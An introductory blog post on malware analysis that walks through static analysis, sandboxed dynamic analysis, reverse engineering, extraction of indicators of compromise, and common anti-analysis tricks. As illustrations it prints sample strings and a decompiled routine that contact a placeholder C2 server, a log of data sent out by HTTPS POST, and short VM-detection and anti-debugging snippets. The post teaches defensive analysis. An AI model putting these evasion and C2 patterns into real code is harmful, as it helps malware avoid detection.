Thilan Dissanayaka Malware February 29, 2020

What is Malware Analysis?

You download what looks like a normal PDF. You open it. Nothing happens — or so you think. Behind the scenes, a process just spawned, a connection just opened to a server in Eastern Europe, and your keystrokes are now being logged.

How do you figure out what just happened? How do you take that suspicious file, rip it apart, and understand exactly what it does — without getting infected yourself?

That’s malware analysis. And it’s one of the most fascinating disciplines in cybersecurity.

What is Malware Analysis?

Malware analysis is the process of examining malicious software to understand:

How it works — What does the code actually do?
How it spreads — Does it exploit a vulnerability? Social engineering? USB drives?
What it targets — Files? Credentials? Network resources?
What damage it causes — Data theft? Encryption? Persistence?
How to detect and prevent it — What signatures, indicators, or behaviors can we look for?

The end goal is to extract Indicators of Compromise (IoCs) — things like file hashes, IP addresses, domain names, registry keys, or mutex names that uniquely identify the malware. These IoCs feed into antivirus signatures, firewall rules, intrusion detection systems, and threat intelligence platforms.

Think of it like forensic science, but for software. A detective examines a crime scene to understand what happened, who did it, and how to catch them. A malware analyst does the same thing — but the crime scene is a binary file, and the evidence is hidden in assembly code, network traffic, and system calls.

Types of Malware — Know Your Enemy

Before we analyze malware, let’s understand what we’re dealing with. Malware comes in many flavors, each with different objectives and behaviors.

Type	What It Does	Example
Virus	Attaches itself to legitimate programs and spreads when those programs run	CIH (Chernobyl virus)
Worm	Self-replicating — spreads across networks without user interaction	WannaCry, Conficker
Trojan	Disguises itself as legitimate software to trick users into running it	Zeus, Emotet
Ransomware	Encrypts your files and demands payment for the decryption key	WannaCry, LockBit, Ryuk
Spyware	Silently monitors user activity — keystrokes, screenshots, browsing history	Pegasus, FinFisher
Rootkit	Hides deep in the OS to maintain persistent, undetectable access	Sony BMG rootkit, ZeroAccess
RAT (Remote Access Trojan)	Gives the attacker full remote control over the infected machine	DarkComet, njRAT
Botnet Agent	Turns the infected machine into a “zombie” controlled by a command server	Mirai, Emotet (also a botnet)

Most modern malware doesn’t fit neatly into one category. WannaCry, for instance, was a worm (self-propagating via EternalBlue exploit) that delivered ransomware (encrypted files and demanded Bitcoin). Emotet started as a banking trojan, evolved into a botnet, and became a delivery platform for other malware. The lines are blurry.

The Three Pillars of Malware Analysis

There are three main approaches to analyzing malware, each with different depth, difficulty, and trade-offs.

1. Static Analysis — Look, Don’t Touch

Static analysis means examining the malware without executing it. You’re looking at the file itself — its structure, metadata, strings, imports, and code — but never actually running it.

This is the safest approach. Since the malware never executes, there’s no risk of infection. It’s also the fastest way to get a first impression.

What you do in static analysis:

File identification — What type of file is it? PE executable? ELF binary? Office document with macros?
Hashing — Generate SHA256/MD5 hashes to fingerprint the sample and check if it’s already known
String extraction — Pull readable text from the binary. You’d be surprised how often malware contains URLs, IP addresses, error messages, or even the author’s username in plain text
PE header analysis — For Windows executables, examine the imports (what Windows APIs does it call?), exports, sections, and timestamps
Packer detection — Is the binary packed or obfuscated? Packers like UPX compress the binary to hide its true contents

Example — extracting strings from a suspicious binary:

$ strings suspicious.exe | head -20
!This program cannot be run in DOS mode.
.text
.rdata
.data
kernel32.dll
CreateFileA
WriteFile
WinExec
http://evil-c2-server.com/beacon
cmd.exe /c whoami
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Look at that. Without running a single line of code, we already know this binary:

Calls CreateFileA and WriteFile (file system operations)
Uses WinExec (executing commands)
Reaches out to http://evil-c2-server.com/beacon (command & control server)
Runs cmd.exe /c whoami (reconnaissance)
Writes to the Run registry key (persistence — it wants to survive reboots)

That’s a lot of intelligence from just strings. Of course, sophisticated malware won’t leave strings in plaintext — they’ll encrypt or obfuscate them. But you’d be surprised how many samples are sloppy.

Example — checking a hash on VirusTotal:

$ sha256sum suspicious.exe
a1b2c3d4e5f6... suspicious.exe

Take that hash, search it on VirusTotal, and you’ll instantly see if 70+ antivirus engines have already flagged it. If it’s a known sample, someone has probably already written a full report on it.

2. Dynamic Analysis — Let It Run (Safely)

Dynamic analysis means executing the malware in a controlled environment and observing what it does. Instead of reading the code, you watch its behavior — what files it creates, what network connections it makes, what registry keys it modifies.

This is more dangerous than static analysis because the malware is actually running. That’s why you always do this inside a sandbox — an isolated virtual machine that you can snapshot before execution and revert after.

What you observe in dynamic analysis:

Process activity — What processes does it spawn? Does it inject into other processes?
File system changes — Does it create, modify, or delete files?
Registry changes — Does it add persistence keys? Modify security settings?
Network traffic — What domains does it contact? What data does it send?
API calls — What system calls does the malware make at runtime?

Setting up a safe analysis environment:

The golden rule — never analyze malware on your host machine. Here’s a typical setup:

Create a VM — Use VirtualBox or VMware. Windows 10 is the most common target OS
Take a clean snapshot — Before you introduce any malware
Disable networking (or route through an isolated network) — You don’t want the malware calling home from your network
Install analysis tools inside the VM — Process Monitor, Wireshark, Regshot, etc.
Copy the sample into the VM and execute it
Observe everything — Capture network traffic, file changes, registry modifications
Revert to snapshot when done — The VM is clean again, as if nothing happened

Example — watching malware behavior with Process Monitor:

After detonating the sample in your sandbox, Process Monitor (Procmon) shows you every file operation, registry access, and network call in real time:

Operation       Path                                        Result
CreateFile      C:\Users\Admin\AppData\Local\Temp\svchost.exe    SUCCESS
RegSetValue     HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update    SUCCESS
TCP Connect     185.141.27.98:443                           SUCCESS
CreateFile      C:\Users\Admin\Documents\*.docx             SUCCESS
WriteFile       C:\Users\Admin\Documents\README_DECRYPT.txt SUCCESS

From this we can see the malware:

Drops a copy of itself as svchost.exe in the Temp folder (disguised as a system process)
Adds itself to the Run key (persistence)
Connects to 185.141.27.98 on port 443 (C2 communication)
Accesses .docx files (likely encrypting them)
Drops a ransom note (README_DECRYPT.txt)

That’s ransomware behavior — and we figured it out just by watching.

Automated sandboxes:

If you don’t want to set up everything manually, automated sandboxes do the heavy lifting for you:

Cuckoo Sandbox — Open-source, self-hosted. Submit a file, and it runs it in a VM, captures everything, and generates a full report
Any.Run — Interactive online sandbox. You can watch the malware execute in real time in your browser
Hybrid Analysis — Free online sandbox by CrowdStrike. Upload a sample and get a detailed behavior report
Joe Sandbox — Commercial-grade, incredibly detailed analysis

3. Reverse Engineering — Reading the Blueprint

Reverse engineering is the deepest level of analysis. You take the compiled binary, disassemble it back into assembly code (or decompile it into pseudo-C), and read through the logic line by line.

This is where you go from “this malware contacts a C2 server” to “this malware uses a custom XOR-based encryption algorithm with key 0x4F to encode its C2 communications, and it falls back to a DGA (Domain Generation Algorithm) if the primary C2 is unreachable.”

This is the hard part. It requires:

Understanding of x86/x64 assembly language
Knowledge of OS internals (Windows API, PE format, memory management)
Patience — a lot of patience
Familiarity with disassemblers and debuggers

Key tools for reverse engineering:

Tool	Type	Notes
Ghidra	Disassembler/Decompiler	Free, open-source (by NSA). Excellent decompiler
IDA Pro	Disassembler/Decompiler	Industry standard. Expensive, but the best
x64dbg	Debugger	Free, great for dynamic debugging on Windows
Radare2/Cutter	Disassembler/Debugger	Free, open-source. Steep learning curve
Binary Ninja	Disassembler	Clean UI, good API for scripting

Example — decrypting hardcoded strings with Ghidra:

You load the malware into Ghidra, and the decompiler shows you something like this:

void decrypt_string(char *encrypted, int len) {
    for (int i = 0; i < len; i++) {
        encrypted[i] = encrypted[i] ^ 0x4F;
    }
}

void contact_c2(void) {
    char c2_domain[] = {0x2D, 0x29, 0x2E, 0x27, 0x1E, 0x24, 0x20, 0x1E, ...};
    decrypt_string(c2_domain, sizeof(c2_domain));
    // c2_domain is now "evil-c2-server.com"
    connect_to_server(c2_domain);
}

The malware stored its C2 domain as XOR-encrypted bytes — strings wouldn’t have caught this. But by reverse engineering the decryption function, we recovered the actual domain. That’s an IoC we can now feed into our detection systems.

This is why static analysis alone isn’t always enough. Sophisticated malware obfuscates everything — strings, API calls, control flow. Reverse engineering peels back those layers.

A Complete Analysis Workflow

Let’s put it all together. Here’s a realistic workflow for analyzing a suspicious sample from start to finish.

Step 1: Sample Collection and Safety

You receive a suspicious file — maybe from a honeypot, an email attachment, or an incident response engagement.

# First, hash it for identification
$ sha256sum sample.exe
e3b0c44298fc1c149afbf4c8996fb924...

# Check the hash on VirusTotal
# If it's already known, read existing reports first

# Identify the file type
$ file sample.exe
PE32 executable (GUI) Intel 80386, for MS Windows

Step 2: Static Analysis

# Extract strings
$ strings -n 8 sample.exe > strings_output.txt

# Check for packers
$ die sample.exe    # Detect It Easy
# Result: UPX 3.96 detected

# Unpack if needed
$ upx -d sample.exe -o sample_unpacked.exe

# Analyze PE headers with pefile (Python)
$ python3 -c "
import pefile
pe = pefile.PE('sample_unpacked.exe')
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    print(entry.dll.decode())
    for func in entry.imports:
        print(f'  {func.name.decode() if func.name else hex(func.ordinal)}')
"

Suspicious imports to watch for:

API Call	Why It’s Suspicious
`VirtualAlloc` / `VirtualProtect`	Allocating executable memory (shellcode injection)
`CreateRemoteThread`	Injecting code into another process
`WriteProcessMemory`	Writing into another process’s memory
`URLDownloadToFile`	Downloading files from the internet
`RegSetValueEx`	Modifying the registry (persistence)
`CryptEncrypt`	Encrypting data (ransomware indicator)
`IsDebuggerPresent`	Anti-analysis — checking if it’s being debugged

Step 3: Dynamic Analysis

Fire up your sandbox VM, take a snapshot, and detonate the sample.

Run these tools simultaneously:

Process Monitor — Capture all file, registry, and network operations
Wireshark — Capture all network traffic
Regshot — Take a registry snapshot before and after execution to see what changed
Process Hacker — Monitor running processes and their memory

Execute the sample and let it run for a few minutes. Some malware has sleep timers or checks for user activity before activating.

Step 4: Analyze the Results

After execution, you review:

=== Network Connections ===
DNS query: update-service.malwaredomain.com → 185.141.27.98
HTTPS connection to 185.141.27.98:443
POST /gate.php with encrypted body (likely exfiltrated data)

=== File System Changes ===
Created: C:\Users\Admin\AppData\Local\Temp\updater.exe (copy of itself)
Created: C:\Users\Admin\AppData\Roaming\config.dat (encrypted config)
Modified: Multiple .docx and .xlsx files in Documents folder

=== Registry Changes ===
Added: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
  Value: C:\Users\Admin\AppData\Local\Temp\updater.exe

=== Process Activity ===
sample.exe → spawned cmd.exe → executed "whoami" and "ipconfig"
sample.exe → injected into explorer.exe via CreateRemoteThread

Step 5: Extract IoCs

From all of this analysis, we compile our Indicators of Compromise:

Indicators of Compromise:
  File Hashes:
    - SHA256: e3b0c44298fc1c149afbf4c8996fb924...
    - MD5: d41d8cd98f00b204e9800998ecf8427e

  Network:
    - Domain: update-service.malwaredomain.com
    - IP: 185.141.27.98
    - URL: https://185.141.27.98/gate.php
    - User-Agent: "Mozilla/5.0 (compatible; MSIE 10.0)"

  Host:
    - File: C:\Users\*\AppData\Local\Temp\updater.exe
    - Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
    - Mutex: Global\XYZ_MUTEX_001

  Behavior:
    - Enumerates documents (.docx, .xlsx, .pdf)
    - Process injection via CreateRemoteThread into explorer.exe
    - Exfiltrates data via HTTPS POST to /gate.php

These IoCs are now actionable. They can be shared with your security team, fed into your SIEM, used to write firewall rules, or published in a threat intelligence report.

Anti-Analysis Techniques — Malware Fights Back

Here’s where it gets interesting. Malware authors know their creations will be analyzed, so they build in defenses. Some common anti-analysis techniques:

VM Detection

The malware checks if it’s running inside a virtual machine. If yes, it assumes it’s being analyzed and either does nothing or self-destructs.

// Check for VMware registry key
RegOpenKeyEx(HKLM, "SOFTWARE\\VMware, Inc.\\VMware Tools", ...);

// Check for VirtualBox artifacts
if (GetModuleHandle("VBoxHook.dll") != NULL) {
    ExitProcess(0);  // We're being analyzed, bail out
}

// Check CPU instruction timing
// VMs have slightly different timing for CPUID instructions

Counter: Use bare-metal analysis machines for sophisticated samples, or patch VM artifacts to make the environment look more like a real machine.

Anti-Debugging

The malware detects if a debugger is attached and changes its behavior.

if (IsDebuggerPresent()) {
    // Run benign code instead of malicious payload
    MessageBox(NULL, "Hello World!", "Legit App", MB_OK);
    return;
}

Counter: Patch IsDebuggerPresent to always return false, or use kernel-level debuggers that are harder to detect.

Packing and Obfuscation

The malware’s real code is compressed or encrypted. At runtime, it unpacks itself into memory. Static analysis sees only the packer stub, not the actual malicious code.

Counter: Let the malware unpack itself in a debugger, then dump the unpacked code from memory.

Time Bombs

The malware waits — sometimes minutes, sometimes days — before activating. If a sandbox only runs for 60 seconds, it’ll see nothing malicious.

Counter: Fast-forward the system clock in the sandbox, or use sandboxes with extended execution times.

Essential Tools — Your Analysis Toolkit

Here’s a summary of the tools we’ve mentioned, organized by purpose.

Category	Tool	Platform	Cost
Static Analysis	`strings`, `file`, `xxd`	Linux/Mac	Free
	Detect It Easy (DIE)	Windows/Linux	Free
	`pefile` (Python library)	Cross-platform	Free
	PEStudio	Windows	Free
Dynamic Analysis	Process Monitor (Procmon)	Windows	Free
	Process Hacker	Windows	Free
	Regshot	Windows	Free
	Wireshark	Cross-platform	Free
Sandboxes	Cuckoo Sandbox	Self-hosted	Free
	Any.Run	Online	Free tier
	Hybrid Analysis	Online	Free
Reverse Engineering	Ghidra	Cross-platform	Free
	IDA Pro / IDA Free	Cross-platform	Free / Paid
	x64dbg	Windows	Free
	Radare2 / Cutter	Cross-platform	Free
Online Analysis	VirusTotal	Web	Free
	MalwareBazaar	Web	Free
	URLhaus	Web	Free

You don’t need all of these to get started. A solid beginner setup would be: a Windows VM + Process Monitor + Wireshark + Ghidra + VirusTotal. That’s enough to perform basic static and dynamic analysis on most samples.

Getting Started — Where to Practice

You can’t learn malware analysis without samples to analyze. Here are some safe, legal resources:

MalwareBazaar (bazaar.abuse.ch) — A repository of malware samples shared by the security community. Free to download (you’ll need an account)
theZoo (github.com/ytisf/theZoo) — A curated collection of malware samples for research purposes
Any.Run — Watch other people’s analysis sessions to learn what to look for
Practical Malware Analysis (book by Sikorski & Honig) — The gold standard for learning. Comes with lab exercises and sample files
Malware Unicorn’s workshops — Free, hands-on reverse engineering workshops

Start with static analysis — it’s the safest and gives you quick wins. Once you’re comfortable, move to dynamic analysis in a VM. And when you’re ready for the deep end, pick up Ghidra and start reverse engineering.

Final Thoughts

Malware analysis is one of those fields that sits at the intersection of programming, security, and detective work. Every sample is a puzzle — the author is trying to hide what it does, and your job is to figure it out anyway.

What I find most fascinating is that it forces you to understand how computers actually work — at the OS level, at the network level, at the assembly level. You can’t analyze a rootkit without understanding how the kernel manages processes. You can’t spot a C2 beacon without understanding how DNS and HTTP work. You can’t reverse engineer an encryption routine without understanding the math behind it.

If you’re interested in cybersecurity and want to understand the offensive side from a defensive perspective — malware analysis is an incredible place to start.

Stay curious, and happy hunting!